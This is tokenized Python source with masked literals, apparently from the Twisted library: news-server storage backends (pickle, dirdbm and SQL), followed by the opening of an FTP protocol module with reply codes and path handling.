<EOL> moderators = self . getModerators ( groups ) <EOL> if moderators and not a . getHeader ( '<STR_LIT>' ) : <EOL> return self . notifyModerators ( moderators , a ) <EOL> for group in groups : <EOL> if group in self . db : <EOL> if len ( self . db [ group ] . keys ( ) ) : <EOL> index = max ( self . db [ group ] . keys ( ) ) + <NUM_LIT:1> <EOL> else : <EOL> index = <NUM_LIT:1> <EOL> xref . 
append ( ( group , str ( index ) ) ) <EOL> self . db [ group ] [ index ] = a <EOL> if len ( xref ) == <NUM_LIT:0> : <EOL> return defer . fail ( None ) <EOL> a . putHeader ( '<STR_LIT>' , '<STR_LIT>' % ( <EOL> socket . gethostname ( ) . split ( ) [ <NUM_LIT:0> ] , <EOL> '<STR_LIT>' . join ( map ( lambda x : '<STR_LIT::>' . join ( x ) , xref ) ) <EOL> ) ) <EOL> self . flush ( ) <EOL> return defer . succeed ( None ) <EOL> def overviewRequest ( self ) : <EOL> return defer . succeed ( OVERVIEW_FMT ) <EOL> def xoverRequest ( self , group , low , high ) : <EOL> if not self . db . has_key ( group ) : <EOL> return defer . succeed ( [ ] ) <EOL> r = [ ] <EOL> for i in self . db [ group ] . keys ( ) : <EOL> if ( low is None or i >= low ) and ( high is None or i <= high ) : <EOL> r . append ( [ str ( i ) ] + self . db [ group ] [ i ] . overview ( ) ) <EOL> return defer . succeed ( r ) <EOL> def xhdrRequest ( self , group , low , high , header ) : <EOL> if not self . db . has_key ( group ) : <EOL> return defer . succeed ( [ ] ) <EOL> r = [ ] <EOL> for i in self . db [ group ] . keys ( ) : <EOL> if low is None or i >= low and high is None or i <= high : <EOL> r . append ( ( i , self . db [ group ] [ i ] . getHeader ( header ) ) ) <EOL> return defer . succeed ( r ) <EOL> def listGroupRequest ( self , group ) : <EOL> if self . db . has_key ( group ) : <EOL> return defer . succeed ( ( group , self . db [ group ] . keys ( ) ) ) <EOL> else : <EOL> return defer . fail ( None ) <EOL> def groupRequest ( self , group ) : <EOL> if self . db . has_key ( group ) : <EOL> if len ( self . db [ group ] . keys ( ) ) : <EOL> num = len ( self . db [ group ] . keys ( ) ) <EOL> low = min ( self . db [ group ] . keys ( ) ) <EOL> high = max ( self . db [ group ] . keys ( ) ) <EOL> else : <EOL> num = low = high = <NUM_LIT:0> <EOL> flags = '<STR_LIT:y>' <EOL> return defer . succeed ( ( group , num , high , low , flags ) ) <EOL> else : <EOL> return defer . 
fail ( ERR_NOGROUP ) <EOL> def articleExistsRequest ( self , id ) : <EOL> for group in self . db [ '<STR_LIT>' ] : <EOL> for a in self . db [ group ] . values ( ) : <EOL> if a . getHeader ( '<STR_LIT>' ) == id : <EOL> return defer . succeed ( <NUM_LIT:1> ) <EOL> return defer . succeed ( <NUM_LIT:0> ) <EOL> def articleRequest ( self , group , index , id = None ) : <EOL> if id is not None : <EOL> raise NotImplementedError <EOL> if self . db . has_key ( group ) : <EOL> if self . db [ group ] . has_key ( index ) : <EOL> a = self . db [ group ] [ index ] <EOL> return defer . succeed ( ( <EOL> index , <EOL> a . getHeader ( '<STR_LIT>' ) , <EOL> StringIO . StringIO ( a . textHeaders ( ) + '<STR_LIT:\r\n>' + a . body ) <EOL> ) ) <EOL> else : <EOL> return defer . fail ( ERR_NOARTICLE ) <EOL> else : <EOL> return defer . fail ( ERR_NOGROUP ) <EOL> def headRequest ( self , group , index ) : <EOL> if self . db . has_key ( group ) : <EOL> if self . db [ group ] . has_key ( index ) : <EOL> a = self . db [ group ] [ index ] <EOL> return defer . succeed ( ( index , a . getHeader ( '<STR_LIT>' ) , a . textHeaders ( ) ) ) <EOL> else : <EOL> return defer . fail ( ERR_NOARTICLE ) <EOL> else : <EOL> return defer . fail ( ERR_NOGROUP ) <EOL> def bodyRequest ( self , group , index ) : <EOL> if self . db . has_key ( group ) : <EOL> if self . db [ group ] . has_key ( index ) : <EOL> a = self . db [ group ] [ index ] <EOL> return defer . succeed ( ( index , a . getHeader ( '<STR_LIT>' ) , StringIO . StringIO ( a . body ) ) ) <EOL> else : <EOL> return defer . fail ( ERR_NOARTICLE ) <EOL> else : <EOL> return defer . fail ( ERR_NOGROUP ) <EOL> def flush ( self ) : <EOL> f = open ( self . datafile , '<STR_LIT:w>' ) <EOL> pickle . dump ( self . db , f ) <EOL> f . close ( ) <EOL> def load ( self , filename , groups = None , moderators = ( ) ) : <EOL> if filename in PickleStorage . sharedDBs : <EOL> self . db = PickleStorage . sharedDBs [ filename ] <EOL> else : <EOL> try : <EOL> self . 
db = pickle . load ( open ( filename ) ) <EOL> PickleStorage . sharedDBs [ filename ] = self . db <EOL> except IOError : <EOL> self . db = PickleStorage . sharedDBs [ filename ] = { } <EOL> self . db [ '<STR_LIT>' ] = groups <EOL> if groups is not None : <EOL> for i in groups : <EOL> self . db [ i ] = { } <EOL> self . db [ '<STR_LIT>' ] = dict ( moderators ) <EOL> self . flush ( ) <EOL> class Group : <EOL> name = None <EOL> flags = '<STR_LIT>' <EOL> minArticle = <NUM_LIT:1> <EOL> maxArticle = <NUM_LIT:0> <EOL> articles = None <EOL> def __init__ ( self , name , flags = '<STR_LIT:y>' ) : <EOL> self . name = name <EOL> self . flags = flags <EOL> self . articles = { } <EOL> class NewsShelf ( _ModerationMixin ) : <EOL> """<STR_LIT>""" <EOL> implements ( INewsStorage ) <EOL> def __init__ ( self , mailhost , path , sender = None ) : <EOL> """<STR_LIT>""" <EOL> self . path = path <EOL> self . _mailhost = self . mailhost = mailhost <EOL> self . _sender = sender <EOL> if not os . path . exists ( path ) : <EOL> os . mkdir ( path ) <EOL> self . dbm = dirdbm . Shelf ( os . path . join ( path , "<STR_LIT>" ) ) <EOL> if not len ( self . dbm . keys ( ) ) : <EOL> self . initialize ( ) <EOL> def initialize ( self ) : <EOL> self . dbm [ '<STR_LIT>' ] = dirdbm . Shelf ( os . path . join ( self . path , '<STR_LIT>' ) ) <EOL> self . dbm [ '<STR_LIT>' ] = dirdbm . Shelf ( os . path . join ( self . path , '<STR_LIT>' ) ) <EOL> self . dbm [ '<STR_LIT>' ] = [ ] <EOL> self . dbm [ '<STR_LIT>' ] = dirdbm . Shelf ( os . path . join ( self . path , '<STR_LIT>' ) ) <EOL> def addGroup ( self , name , flags ) : <EOL> self . dbm [ '<STR_LIT>' ] [ name ] = Group ( name , flags ) <EOL> def addSubscription ( self , name ) : <EOL> self . dbm [ '<STR_LIT>' ] = self . dbm [ '<STR_LIT>' ] + [ name ] <EOL> def addModerator ( self , group , email ) : <EOL> self . dbm [ '<STR_LIT>' ] [ group ] = email <EOL> def listRequest ( self ) : <EOL> result = [ ] <EOL> for g in self . dbm [ '<STR_LIT>' ] . 
values ( ) : <EOL> result . append ( ( g . name , g . maxArticle , g . minArticle , g . flags ) ) <EOL> return defer . succeed ( result ) <EOL> def subscriptionRequest ( self ) : <EOL> return defer . succeed ( self . dbm [ '<STR_LIT>' ] ) <EOL> def getModerator ( self , groups ) : <EOL> for group in groups : <EOL> try : <EOL> return self . dbm [ '<STR_LIT>' ] [ group ] <EOL> except KeyError : <EOL> pass <EOL> return None <EOL> def notifyModerator ( self , moderator , article ) : <EOL> """<STR_LIT>""" <EOL> return self . notifyModerators ( [ moderator ] , article ) <EOL> def postRequest ( self , message ) : <EOL> cleave = message . find ( '<STR_LIT>' ) <EOL> headers , article = message [ : cleave ] , message [ cleave + <NUM_LIT:4> : ] <EOL> article = Article ( headers , article ) <EOL> groups = article . getHeader ( '<STR_LIT>' ) . split ( ) <EOL> xref = [ ] <EOL> moderator = self . getModerator ( groups ) <EOL> if moderator and not article . getHeader ( '<STR_LIT>' ) : <EOL> return self . notifyModerators ( [ moderator ] , article ) <EOL> for group in groups : <EOL> try : <EOL> g = self . dbm [ '<STR_LIT>' ] [ group ] <EOL> except KeyError : <EOL> pass <EOL> else : <EOL> index = g . maxArticle + <NUM_LIT:1> <EOL> g . maxArticle += <NUM_LIT:1> <EOL> g . articles [ index ] = article <EOL> xref . append ( ( group , str ( index ) ) ) <EOL> self . dbm [ '<STR_LIT>' ] [ group ] = g <EOL> if not xref : <EOL> return defer . fail ( NewsServerError ( "<STR_LIT>" + '<STR_LIT:U+0020>' . join ( groups ) ) ) <EOL> article . putHeader ( '<STR_LIT>' , '<STR_LIT>' % ( socket . gethostname ( ) . split ( ) [ <NUM_LIT:0> ] , '<STR_LIT:U+0020>' . join ( map ( lambda x : '<STR_LIT::>' . join ( x ) , xref ) ) ) ) <EOL> self . dbm [ '<STR_LIT>' ] [ article . getHeader ( '<STR_LIT>' ) ] = xref <EOL> return defer . succeed ( None ) <EOL> def overviewRequest ( self ) : <EOL> return defer . succeed ( OVERVIEW_FMT ) <EOL> def xoverRequest ( self , group , low , high ) : <EOL> if not self . 
dbm [ '<STR_LIT>' ] . has_key ( group ) : <EOL> return defer . succeed ( [ ] ) <EOL> if low is None : <EOL> low = <NUM_LIT:0> <EOL> if high is None : <EOL> high = self . dbm [ '<STR_LIT>' ] [ group ] . maxArticle <EOL> r = [ ] <EOL> for i in range ( low , high + <NUM_LIT:1> ) : <EOL> if self . dbm [ '<STR_LIT>' ] [ group ] . articles . has_key ( i ) : <EOL> r . append ( [ str ( i ) ] + self . dbm [ '<STR_LIT>' ] [ group ] . articles [ i ] . overview ( ) ) <EOL> return defer . succeed ( r ) <EOL> def xhdrRequest ( self , group , low , high , header ) : <EOL> if group not in self . dbm [ '<STR_LIT>' ] : <EOL> return defer . succeed ( [ ] ) <EOL> if low is None : <EOL> low = <NUM_LIT:0> <EOL> if high is None : <EOL> high = self . dbm [ '<STR_LIT>' ] [ group ] . maxArticle <EOL> r = [ ] <EOL> for i in range ( low , high + <NUM_LIT:1> ) : <EOL> if i in self . dbm [ '<STR_LIT>' ] [ group ] . articles : <EOL> r . append ( ( i , self . dbm [ '<STR_LIT>' ] [ group ] . articles [ i ] . getHeader ( header ) ) ) <EOL> return defer . succeed ( r ) <EOL> def listGroupRequest ( self , group ) : <EOL> if self . dbm [ '<STR_LIT>' ] . has_key ( group ) : <EOL> return defer . succeed ( ( group , self . dbm [ '<STR_LIT>' ] [ group ] . articles . keys ( ) ) ) <EOL> return defer . fail ( NewsServerError ( "<STR_LIT>" + group ) ) <EOL> def groupRequest ( self , group ) : <EOL> try : <EOL> g = self . dbm [ '<STR_LIT>' ] [ group ] <EOL> except KeyError : <EOL> return defer . fail ( NewsServerError ( "<STR_LIT>" + group ) ) <EOL> else : <EOL> flags = g . flags <EOL> low = g . minArticle <EOL> high = g . maxArticle <EOL> num = high - low + <NUM_LIT:1> <EOL> return defer . succeed ( ( group , num , high , low , flags ) ) <EOL> def articleExistsRequest ( self , id ) : <EOL> return defer . succeed ( id in self . dbm [ '<STR_LIT>' ] ) <EOL> def articleRequest ( self , group , index , id = None ) : <EOL> if id is not None : <EOL> try : <EOL> xref = self . 
dbm [ '<STR_LIT>' ] [ id ] <EOL> except KeyError : <EOL> return defer . fail ( NewsServerError ( "<STR_LIT>" + id ) ) <EOL> else : <EOL> group , index = xref [ <NUM_LIT:0> ] <EOL> index = int ( index ) <EOL> try : <EOL> a = self . dbm [ '<STR_LIT>' ] [ group ] . articles [ index ] <EOL> except KeyError : <EOL> return defer . fail ( NewsServerError ( "<STR_LIT>" + group ) ) <EOL> else : <EOL> return defer . succeed ( ( <EOL> index , <EOL> a . getHeader ( '<STR_LIT>' ) , <EOL> StringIO . StringIO ( a . textHeaders ( ) + '<STR_LIT:\r\n>' + a . body ) <EOL> ) ) <EOL> def headRequest ( self , group , index , id = None ) : <EOL> if id is not None : <EOL> try : <EOL> xref = self . dbm [ '<STR_LIT>' ] [ id ] <EOL> except KeyError : <EOL> return defer . fail ( NewsServerError ( "<STR_LIT>" + id ) ) <EOL> else : <EOL> group , index = xref [ <NUM_LIT:0> ] <EOL> index = int ( index ) <EOL> try : <EOL> a = self . dbm [ '<STR_LIT>' ] [ group ] . articles [ index ] <EOL> except KeyError : <EOL> return defer . fail ( NewsServerError ( "<STR_LIT>" + group ) ) <EOL> else : <EOL> return defer . succeed ( ( index , a . getHeader ( '<STR_LIT>' ) , a . textHeaders ( ) ) ) <EOL> def bodyRequest ( self , group , index , id = None ) : <EOL> if id is not None : <EOL> try : <EOL> xref = self . dbm [ '<STR_LIT>' ] [ id ] <EOL> except KeyError : <EOL> return defer . fail ( NewsServerError ( "<STR_LIT>" + id ) ) <EOL> else : <EOL> group , index = xref [ <NUM_LIT:0> ] <EOL> index = int ( index ) <EOL> try : <EOL> a = self . dbm [ '<STR_LIT>' ] [ group ] . articles [ index ] <EOL> except KeyError : <EOL> return defer . fail ( NewsServerError ( "<STR_LIT>" + group ) ) <EOL> else : <EOL> return defer . succeed ( ( index , a . getHeader ( '<STR_LIT>' ) , StringIO . StringIO ( a . body ) ) ) <EOL> class NewsStorageAugmentation : <EOL> """<STR_LIT>""" <EOL> implements ( INewsStorage ) <EOL> schema = """<STR_LIT>""" <EOL> def __init__ ( self , info ) : <EOL> self . info = info <EOL> self . 
dbpool = adbapi . ConnectionPool ( ** self . info ) <EOL> def __setstate__ ( self , state ) : <EOL> self . __dict__ = state <EOL> self . info [ '<STR_LIT:password>' ] = getpass . getpass ( '<STR_LIT>' % ( self . info [ '<STR_LIT:user>' ] , ) ) <EOL> self . dbpool = adbapi . ConnectionPool ( ** self . info ) <EOL> del self . info [ '<STR_LIT:password>' ] <EOL> def listRequest ( self ) : <EOL> sql = """<STR_LIT>""" <EOL> return self . dbpool . runQuery ( sql ) <EOL> def subscriptionRequest ( self ) : <EOL> sql = """<STR_LIT>""" <EOL> return self . dbpool . runQuery ( sql ) <EOL> def postRequest ( self , message ) : <EOL> cleave = message . find ( '<STR_LIT>' ) <EOL> headers , article = message [ : cleave ] , message [ cleave + <NUM_LIT:4> : ] <EOL> article = Article ( headers , article ) <EOL> return self . dbpool . runInteraction ( self . _doPost , article ) <EOL> def _doPost ( self , transaction , article ) : <EOL> groups = article . getHeader ( '<STR_LIT>' ) . split ( ) <EOL> if not len ( groups ) : <EOL> raise NNTPError ( '<STR_LIT>' ) <EOL> sql = """<STR_LIT>""" % ( '<STR_LIT:U+002CU+0020>' . join ( [ ( "<STR_LIT>" % ( adbapi . safe ( group ) , ) ) for group in groups ] ) , ) <EOL> transaction . execute ( sql ) <EOL> result = transaction . fetchall ( ) <EOL> if not len ( result ) : <EOL> raise NNTPError ( '<STR_LIT>' ) <EOL> sql = """<STR_LIT>""" % ( '<STR_LIT:U+002CU+0020>' . join ( [ ( "<STR_LIT>" % ( id , ) ) for ( group , id ) in result ] ) , ) <EOL> transaction . execute ( sql ) <EOL> indices = transaction . fetchall ( ) <EOL> if not len ( indices ) : <EOL> raise NNTPError ( '<STR_LIT>' ) <EOL> gidToName = dict ( [ ( b , a ) for ( a , b ) in result ] ) <EOL> gidToIndex = dict ( indices ) <EOL> nameIndex = [ ] <EOL> for i in gidToName : <EOL> nameIndex . append ( ( gidToName [ i ] , gidToIndex [ i ] ) ) <EOL> xrefs = socket . gethostname ( ) . split ( ) [ <NUM_LIT:0> ] <EOL> xrefs = xrefs + '<STR_LIT:U+0020>' + '<STR_LIT:U+0020>' . 
join ( [ ( '<STR_LIT>' % ( group , id ) ) for ( group , id ) in nameIndex ] ) <EOL> article . putHeader ( '<STR_LIT>' , xrefs ) <EOL> sql = """<STR_LIT>""" % ( <EOL> adbapi . safe ( article . getHeader ( '<STR_LIT>' ) ) , <EOL> adbapi . safe ( article . textHeaders ( ) ) , <EOL> adbapi . safe ( article . body ) <EOL> ) <EOL> transaction . execute ( sql ) <EOL> for gid in gidToName : <EOL> sql = """<STR_LIT>""" % ( gid , gidToIndex [ gid ] ) <EOL> transaction . execute ( sql ) <EOL> return len ( nameIndex ) <EOL> def overviewRequest ( self ) : <EOL> sql = """<STR_LIT>""" <EOL> return self . dbpool . runQuery ( sql ) . addCallback ( lambda result : [ header [ <NUM_LIT:0> ] for header in result ] ) <EOL> def xoverRequest ( self , group , low , high ) : <EOL> sql = """<STR_LIT>""" % ( <EOL> adbapi . safe ( group ) , <EOL> low is not None and "<STR_LIT>" % ( low , ) or "<STR_LIT>" , <EOL> high is not None and "<STR_LIT>" % ( high , ) or "<STR_LIT>" <EOL> ) <EOL> return self . dbpool . runQuery ( sql ) . addCallback ( <EOL> lambda results : [ <EOL> [ id ] + Article ( header , None ) . overview ( ) for ( id , header ) in results <EOL> ] <EOL> ) <EOL> def xhdrRequest ( self , group , low , high , header ) : <EOL> sql = """<STR_LIT>""" % ( adbapi . safe ( group ) , low , high ) <EOL> return self . dbpool . runQuery ( sql ) . addCallback ( <EOL> lambda results : [ <EOL> ( i , Article ( h , None ) . getHeader ( h ) ) for ( i , h ) in results <EOL> ] <EOL> ) <EOL> def listGroupRequest ( self , group ) : <EOL> sql = """<STR_LIT>""" % ( adbapi . safe ( group ) , ) <EOL> return self . dbpool . runQuery ( sql ) . addCallback ( <EOL> lambda results , group = group : ( group , [ res [ <NUM_LIT:0> ] for res in results ] ) <EOL> ) <EOL> def groupRequest ( self , group ) : <EOL> sql = """<STR_LIT>""" % ( adbapi . safe ( group ) , ) <EOL> return self . dbpool . runQuery ( sql ) . 
addCallback ( <EOL> lambda results : tuple ( results [ <NUM_LIT:0> ] ) <EOL> ) <EOL> def articleExistsRequest ( self , id ) : <EOL> sql = """<STR_LIT>""" % ( adbapi . safe ( id ) , ) <EOL> return self . dbpool . runQuery ( sql ) . addCallback ( <EOL> lambda result : bool ( result [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] ) <EOL> ) <EOL> def articleRequest ( self , group , index , id = None ) : <EOL> if id is not None : <EOL> sql = """<STR_LIT>""" % ( adbapi . safe ( id ) , adbapi . safe ( group ) ) <EOL> else : <EOL> sql = """<STR_LIT>""" % ( index , adbapi . safe ( group ) ) <EOL> return self . dbpool . runQuery ( sql ) . addCallback ( <EOL> lambda result : ( <EOL> result [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , <EOL> result [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] , <EOL> StringIO . StringIO ( result [ <NUM_LIT:0> ] [ <NUM_LIT:2> ] + '<STR_LIT:\r\n>' + result [ <NUM_LIT:0> ] [ <NUM_LIT:3> ] ) <EOL> ) <EOL> ) <EOL> def headRequest ( self , group , index ) : <EOL> sql = """<STR_LIT>""" % ( index , adbapi . safe ( group ) ) <EOL> return self . dbpool . runQuery ( sql ) . addCallback ( lambda result : result [ <NUM_LIT:0> ] ) <EOL> def bodyRequest ( self , group , index ) : <EOL> sql = """<STR_LIT>""" % ( index , adbapi . safe ( group ) ) <EOL> return self . dbpool . runQuery ( sql ) . addCallback ( <EOL> lambda result : result [ <NUM_LIT:0> ] <EOL> ) . addCallback ( <EOL> lambda ( index , id , body ) : ( index , id , StringIO . StringIO ( body ) ) <EOL> ) <EOL> def makeGroupSQL ( groups ) : <EOL> res = '<STR_LIT>' <EOL> for g in groups : <EOL> res = res + """<STR_LIT>""" % ( adbapi . safe ( g ) , ) <EOL> return res <EOL> def makeOverviewSQL ( ) : <EOL> res = '<STR_LIT>' <EOL> for o in OVERVIEW_FMT : <EOL> res = res + """<STR_LIT>""" % ( adbapi . safe ( o ) , ) <EOL> return res </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import time <EOL> import re <EOL> import stat <EOL> import errno <EOL> import fnmatch <EOL> try : <EOL> import pwd , grp <EOL> except ImportError : <EOL> pwd = grp = None <EOL> from zope . interface import Interface , implements <EOL> from twisted import copyright <EOL> from twisted . internet import reactor , interfaces , protocol , error , defer <EOL> from twisted . protocols import basic , policies <EOL> from twisted . python import log , failure , filepath <EOL> from twisted . cred import error as cred_error , portal , credentials , checkers <EOL> RESTART_MARKER_REPLY = "<STR_LIT:100>" <EOL> SERVICE_READY_IN_N_MINUTES = "<STR_LIT>" <EOL> DATA_CNX_ALREADY_OPEN_START_XFR = "<STR_LIT>" <EOL> FILE_STATUS_OK_OPEN_DATA_CNX = "<STR_LIT>" <EOL> CMD_OK = "<STR_LIT>" <EOL> TYPE_SET_OK = "<STR_LIT>" <EOL> ENTERING_PORT_MODE = "<STR_LIT>" <EOL> CMD_NOT_IMPLMNTD_SUPERFLUOUS = "<STR_LIT>" <EOL> SYS_STATUS_OR_HELP_REPLY = "<STR_LIT>" <EOL> FEAT_OK = '<STR_LIT>' <EOL> DIR_STATUS = "<STR_LIT>" <EOL> FILE_STATUS = "<STR_LIT>" <EOL> HELP_MSG = "<STR_LIT>" <EOL> NAME_SYS_TYPE = "<STR_LIT>" <EOL> SVC_READY_FOR_NEW_USER = "<STR_LIT>" <EOL> WELCOME_MSG = "<STR_LIT>" <EOL> SVC_CLOSING_CTRL_CNX = "<STR_LIT>" <EOL> GOODBYE_MSG = "<STR_LIT>" <EOL> DATA_CNX_OPEN_NO_XFR_IN_PROGRESS = "<STR_LIT>" <EOL> CLOSING_DATA_CNX = "<STR_LIT>" <EOL> TXFR_COMPLETE_OK = "<STR_LIT>" <EOL> ENTERING_PASV_MODE = "<STR_LIT>" <EOL> ENTERING_EPSV_MODE = "<STR_LIT>" <EOL> USR_LOGGED_IN_PROCEED = "<STR_LIT>" <EOL> GUEST_LOGGED_IN_PROCEED = "<STR_LIT>" <EOL> REQ_FILE_ACTN_COMPLETED_OK = "<STR_LIT>" <EOL> PWD_REPLY = "<STR_LIT>" <EOL> MKD_REPLY = "<STR_LIT>" <EOL> USR_NAME_OK_NEED_PASS = "<STR_LIT>" <EOL> GUEST_NAME_OK_NEED_EMAIL = "<STR_LIT>" <EOL> NEED_ACCT_FOR_LOGIN = "<STR_LIT>" <EOL> REQ_FILE_ACTN_PENDING_FURTHER_INFO = "<STR_LIT>" <EOL> SVC_NOT_AVAIL_CLOSING_CTRL_CNX = "<STR_LIT>" <EOL> TOO_MANY_CONNECTIONS = "<STR_LIT>" <EOL> CANT_OPEN_DATA_CNX = "<STR_LIT>" <EOL> 
CNX_CLOSED_TXFR_ABORTED = "<STR_LIT>" <EOL> REQ_ACTN_ABRTD_FILE_UNAVAIL = "<STR_LIT>" <EOL> REQ_ACTN_ABRTD_LOCAL_ERR = "<STR_LIT>" <EOL> REQ_ACTN_ABRTD_INSUFF_STORAGE = "<STR_LIT>" <EOL> SYNTAX_ERR = "<STR_LIT>" <EOL> SYNTAX_ERR_IN_ARGS = "<STR_LIT>" <EOL> CMD_NOT_IMPLMNTD = "<STR_LIT>" <EOL> OPTS_NOT_IMPLEMENTED = '<STR_LIT>' <EOL> BAD_CMD_SEQ = "<STR_LIT>" <EOL> CMD_NOT_IMPLMNTD_FOR_PARAM = "<STR_LIT>" <EOL> NOT_LOGGED_IN = "<STR_LIT>" <EOL> AUTH_FAILURE = "<STR_LIT>" <EOL> NEED_ACCT_FOR_STOR = "<STR_LIT>" <EOL> FILE_NOT_FOUND = "<STR_LIT>" <EOL> PERMISSION_DENIED = "<STR_LIT>" <EOL> ANON_USER_DENIED = "<STR_LIT>" <EOL> IS_NOT_A_DIR = "<STR_LIT>" <EOL> REQ_ACTN_NOT_TAKEN = "<STR_LIT>" <EOL> FILE_EXISTS = "<STR_LIT>" <EOL> IS_A_DIR = "<STR_LIT>" <EOL> PAGE_TYPE_UNK = "<STR_LIT>" <EOL> EXCEEDED_STORAGE_ALLOC = "<STR_LIT>" <EOL> FILENAME_NOT_ALLOWED = "<STR_LIT>" <EOL> RESPONSE = { <EOL> RESTART_MARKER_REPLY : '<STR_LIT>' , <EOL> SERVICE_READY_IN_N_MINUTES : '<STR_LIT>' , <EOL> DATA_CNX_ALREADY_OPEN_START_XFR : '<STR_LIT>' , <EOL> FILE_STATUS_OK_OPEN_DATA_CNX : '<STR_LIT>' , <EOL> CMD_OK : '<STR_LIT>' , <EOL> TYPE_SET_OK : '<STR_LIT>' , <EOL> ENTERING_PORT_MODE : '<STR_LIT>' , <EOL> CMD_NOT_IMPLMNTD_SUPERFLUOUS : '<STR_LIT>' , <EOL> SYS_STATUS_OR_HELP_REPLY : '<STR_LIT>' , <EOL> FEAT_OK : [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> DIR_STATUS : '<STR_LIT>' , <EOL> FILE_STATUS : '<STR_LIT>' , <EOL> HELP_MSG : '<STR_LIT>' , <EOL> NAME_SYS_TYPE : '<STR_LIT>' , <EOL> WELCOME_MSG : "<STR_LIT>" , <EOL> SVC_READY_FOR_NEW_USER : '<STR_LIT>' , <EOL> SVC_CLOSING_CTRL_CNX : '<STR_LIT>' , <EOL> GOODBYE_MSG : '<STR_LIT>' , <EOL> DATA_CNX_OPEN_NO_XFR_IN_PROGRESS : '<STR_LIT>' , <EOL> CLOSING_DATA_CNX : '<STR_LIT>' , <EOL> TXFR_COMPLETE_OK : '<STR_LIT>' , <EOL> ENTERING_PASV_MODE : '<STR_LIT>' , <EOL> ENTERING_EPSV_MODE : '<STR_LIT>' , <EOL> USR_LOGGED_IN_PROCEED : '<STR_LIT>' , <EOL> GUEST_LOGGED_IN_PROCEED : '<STR_LIT>' , <EOL> REQ_FILE_ACTN_COMPLETED_OK : '<STR_LIT>' , <EOL> 
PWD_REPLY : '<STR_LIT>' , <EOL> MKD_REPLY : '<STR_LIT>' , <EOL> USR_NAME_OK_NEED_PASS : '<STR_LIT>' , <EOL> GUEST_NAME_OK_NEED_EMAIL : '<STR_LIT>' , <EOL> NEED_ACCT_FOR_LOGIN : '<STR_LIT>' , <EOL> REQ_FILE_ACTN_PENDING_FURTHER_INFO : '<STR_LIT>' , <EOL> SVC_NOT_AVAIL_CLOSING_CTRL_CNX : '<STR_LIT>' , <EOL> TOO_MANY_CONNECTIONS : '<STR_LIT>' , <EOL> CANT_OPEN_DATA_CNX : "<STR_LIT>" , <EOL> CNX_CLOSED_TXFR_ABORTED : '<STR_LIT>' , <EOL> REQ_ACTN_ABRTD_FILE_UNAVAIL : '<STR_LIT>' , <EOL> REQ_ACTN_ABRTD_LOCAL_ERR : '<STR_LIT>' , <EOL> REQ_ACTN_ABRTD_INSUFF_STORAGE : '<STR_LIT>' , <EOL> SYNTAX_ERR : "<STR_LIT>" , <EOL> SYNTAX_ERR_IN_ARGS : '<STR_LIT>' , <EOL> CMD_NOT_IMPLMNTD : "<STR_LIT>" , <EOL> OPTS_NOT_IMPLEMENTED : "<STR_LIT>" , <EOL> BAD_CMD_SEQ : '<STR_LIT>' , <EOL> CMD_NOT_IMPLMNTD_FOR_PARAM : "<STR_LIT>" , <EOL> NOT_LOGGED_IN : '<STR_LIT>' , <EOL> AUTH_FAILURE : '<STR_LIT>' , <EOL> NEED_ACCT_FOR_STOR : '<STR_LIT>' , <EOL> FILE_NOT_FOUND : '<STR_LIT>' , <EOL> PERMISSION_DENIED : '<STR_LIT>' , <EOL> ANON_USER_DENIED : '<STR_LIT>' , <EOL> IS_NOT_A_DIR : '<STR_LIT>' , <EOL> FILE_EXISTS : '<STR_LIT>' , <EOL> IS_A_DIR : '<STR_LIT>' , <EOL> REQ_ACTN_NOT_TAKEN : '<STR_LIT>' , <EOL> PAGE_TYPE_UNK : '<STR_LIT>' , <EOL> EXCEEDED_STORAGE_ALLOC : '<STR_LIT>' , <EOL> FILENAME_NOT_ALLOWED : '<STR_LIT>' <EOL> } <EOL> class InvalidPath ( Exception ) : <EOL> """<STR_LIT>""" <EOL> def toSegments ( cwd , path ) : <EOL> """<STR_LIT>""" <EOL> if path . startswith ( '<STR_LIT:/>' ) : <EOL> segs = [ ] <EOL> else : <EOL> segs = cwd [ : ] <EOL> for s in path . split ( '<STR_LIT:/>' ) : <EOL> if s == '<STR_LIT:.>' or s == '<STR_LIT>' : <EOL> continue <EOL> elif s == '<STR_LIT:..>' : <EOL> if segs : <EOL> segs . pop ( ) <EOL> else : <EOL> raise InvalidPath ( cwd , path ) <EOL> elif '<STR_LIT>' in s or '<STR_LIT:/>' in s : <EOL> raise InvalidPath ( cwd , path ) <EOL> else : <EOL> segs . 
append ( s ) <EOL> return segs <EOL> def errnoToFailure ( e , path ) : <EOL> """<STR_LIT>""" <EOL> if e == errno . ENOENT : <EOL> return defer . fail ( FileNotFoundError ( path ) ) <EOL> elif e == errno . EACCES or e == errno . EPERM : <EOL> return defer . fail ( PermissionDeniedError ( path ) ) <EOL> elif e == errno . ENOTDIR : <EOL> return defer . fail ( IsNotADirectoryError ( path ) ) <EOL> elif e == errno . EEXIST : <EOL> return defer . fail ( FileExistsError ( path ) ) <EOL> elif e == errno . EISDIR : <EOL> return defer . fail ( IsADirectoryError ( path ) ) <EOL> else : <EOL> return defer . fail ( ) <EOL> def _isGlobbingExpression ( segments = None ) : <EOL> """<STR_LIT>""" <EOL> if not segments : <EOL> return False <EOL> globCandidate = segments [ - <NUM_LIT:1> ] <EOL> emtpyTranslations = fnmatch . translate ( '<STR_LIT>' ) <EOL> globTranslations = fnmatch . translate ( globCandidate ) <EOL> if globCandidate + emtpyTranslations == globTranslations : <EOL> return False <EOL> else : <EOL> return True <EOL> class FTPCmdError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * msg ) : <EOL> Exception . __init__ ( self , * msg ) <EOL> self . errorMessage = msg <EOL> def response ( self ) : <EOL> """<STR_LIT>""" <EOL> return RESPONSE [ self . errorCode ] % self . 
